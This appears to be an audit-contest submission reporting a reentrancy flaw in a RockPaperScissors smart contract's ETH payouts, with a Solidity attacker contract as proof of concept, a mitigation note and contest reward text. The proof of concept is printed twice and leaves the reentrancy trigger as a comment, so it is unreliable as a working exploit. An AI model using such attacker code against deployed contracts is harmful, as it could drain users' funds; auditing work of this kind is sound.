Submission Details
Severity:
Reentrancy in ETH Transfers
Description: The contract uses .call() for ETH transfers without following the checks-effects-interactions pattern, making it vulnerable to reentrancy attacks. Multiple locations including RockPaperScissors::_finishGame() , RockPaperScissors::_handleTie() , and RockPaperScissors::_cancelGame() functions
Impact: An attacker could potentially drain ETH from the contract by recursively calling these functions.
Proof of Concept:
contract Attacker {
RockPaperScissors game;
uint256 gameId;
constructor(RockPaperScissors _game) {
game = _game;
}
function attack() external payable {
gameId = game.createGameWithEth{value: 0.1 ether}(3, 5 minutes);
game.joinGameWithEth{value: 0.1 ether}(gameId);
// Trigger reentrancy during payout
}
receive() external payable {
if (address(game).balance >= 0.1 ether) {
game.timeoutReveal(gameId);
}
}
}contract Attacker {
RockPaperScissors game;
uint256 gameId;
constructor(RockPaperScissors _game) {
game = _game;
}
function attack() external payable {
gameId = game.createGameWithEth{value: 0.1 ether}(3, 5 minutes);
game.joinGameWithEth{value: 0.1 ether}(gameId);
// Trigger reentrancy during payout
}
receive() external payable {
if (address(game).balance >= 0.1 ether) {
game.timeoutReveal(gameId);
}
}
}
Recommended Mitigation: Use the checks-effects-interactions pattern and consider using OpenZeppelin's ReentrancyGuard.
Rewards breakdown
nSLOC
349This contest has a flat reward structure with the following payouts:
100 EXP
20 EXP
2 EXP
Live
The contest is live. Earn rewards by submitting a finding.
Appeals
This is your time to appeal against judgements on your submissions.
Appeals Review
Appeals are being carefully reviewed by our judges.